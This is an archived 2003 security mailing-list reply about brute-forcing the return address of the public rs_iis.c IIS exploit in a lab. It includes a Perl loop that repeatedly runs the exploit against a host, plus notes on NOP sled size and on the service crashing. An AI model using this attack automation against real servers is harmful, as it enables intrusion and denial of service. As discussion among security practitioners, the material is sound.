OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
RE: Generating Hex Numbers to brute force rs_iis.c

From: Joshua Wright (Joshua.Wrightjwu.edu)
Date: Wed Apr 02 2003 - 09:17:22 CST

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I'm no perl expert, but this is what I whipped up for a similar test:

$myserver = "pvdnet05";
for ($i = 0; $i < 256; $i++) {
 $retcode = sprintf("%x", $i);
 $exec = "./rs_iis $myserver 80 31337 " . $retcode . "04";
 system($exec);
 sleep(1);
}

Note that the last byte of the RET address is not terribly
significant, since the NOP sled is ~65K in size and this value is
only max 256 bytes significant.

This didn't work well for me, since IIS will sometimes crash without
a valid RET address, requiring a server restart. I had meant to look
for a way to restart Windows 2000 services from a Linux box with
Samba or similar tool, but got bored with it and started trying to
exploit something else. :)

- -Joshua Wright
Senior Network and Security Architect
Johnson & Wales University
Joshua.Wrightjwu.edu
http://home.jwu.edu/jwright/

pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73

> In playing with rs_iis.c (ntdll exploit) in our lab, I've been
> looking for ways to brute force the return address.
>
> I know there's been a shell script (rs_brute.sh) released that
> already does this, but since I've been playing with PERL lately
> (and
> since this
> shell script did not exist when I began playing with the exploit),
> I thought I'd take a whack at producing the RET addresses
> (0x0000-0xffff)
> in a PERL script. I just wanted to get your input and see if there
> is and easier way to do this (using PERL, of course).
> Basically, the goal
> is as follows:
>
> 1) generate Hex Numbers from 0x0000 to 0xffff in the following
> pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
> 2) pass the output to rs_iis via system() command?
>
> So far, I can generate the output and print it to stdout. Any tips
> on getting the script to run rs_iis once with each address
> produced by the
> script? Also, is there a way to produce this output without
> creating an
> array like this?
>
> #!/usr/bin/perl -w
> HexD =
> ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
>
> for ($i = 0; $i <= 255; $i += 1) {
> printf("$HexD[int($i / 16)]$HexD[$i % 16]", $i);
> printf("$HexD[int($i / 16)]$HexD[$i % 16]\n", $i);
> }

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBPor/AY/i/ArUS0pzEQJ75wCeNFPqMa0+AwwuCcYgb7YwRdt98KsAn2HZ
Il0dIPyWAX6swPIQfg/LvvQk
=hz0W
-----END PGP SIGNATURE-----